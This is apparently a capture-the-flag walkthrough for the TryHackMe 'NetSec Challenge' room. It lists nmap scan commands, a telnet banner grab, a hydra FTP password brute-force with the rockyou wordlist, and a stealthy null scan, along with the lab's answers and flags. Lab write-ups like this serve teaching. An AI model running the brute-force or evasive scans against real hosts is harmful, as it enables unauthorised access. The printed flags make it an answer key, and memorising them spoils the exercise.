NetSec Challenge

https://tryhackme.com/r/room/netsecchallenge

Challenge 1, 2, 3, 6

nmap -p- -sC -sV -sT -A [Machine Ip]

1. What is the highest port number being open less than 10,000?

8080

2. There is an open port outside the common 1000 ports; it is above 10,000. What is it?

10021

3. How many TCP ports are open?

6

6. We have an FTP server listening on a nonstandard port. What is the version of the FTP server?

vsftpd 3.0.5

Challenge 4

What is the flag hidden in the HTTP server header?

telnet [MCN ip] 80

GET / HTTP /1.1
port : telnet
[double enter]
HTTP/1.1 400 Bad Request
Content-Type: text/html
Content-Length: 345
Connection: close
Date: Mon, 06 Jan 2025 15:15:55 GMT
Server: lighttpd THM{web_server_25352}
<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
         "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
 <head>
  <title>400 Bad Request</title>
 </head>
 <body>
  <h1>400 Bad Request</h1>
 </body>
</html>
Connection closed by foreign host.

Challenge 7

We learned two usernames using social engineering: eddie and quinn. What is the flag hidden in one of these two account files and accessible via FTP?

echo eddie > user.txt
echo quinn >> user.txt
hydra -L users.txt -P /usr/share/wordlists/rockyou.txt -vV [<ftp://10.10.48.169:10021>](<ftp://10.10.48.169:10021/>)

Challenge 8

Browsing to http://10.10.48.169:8080 displays a small challenge that will give you a flag once you solve it. What is the flag?

use null scan

nmap -sN [MCN ip]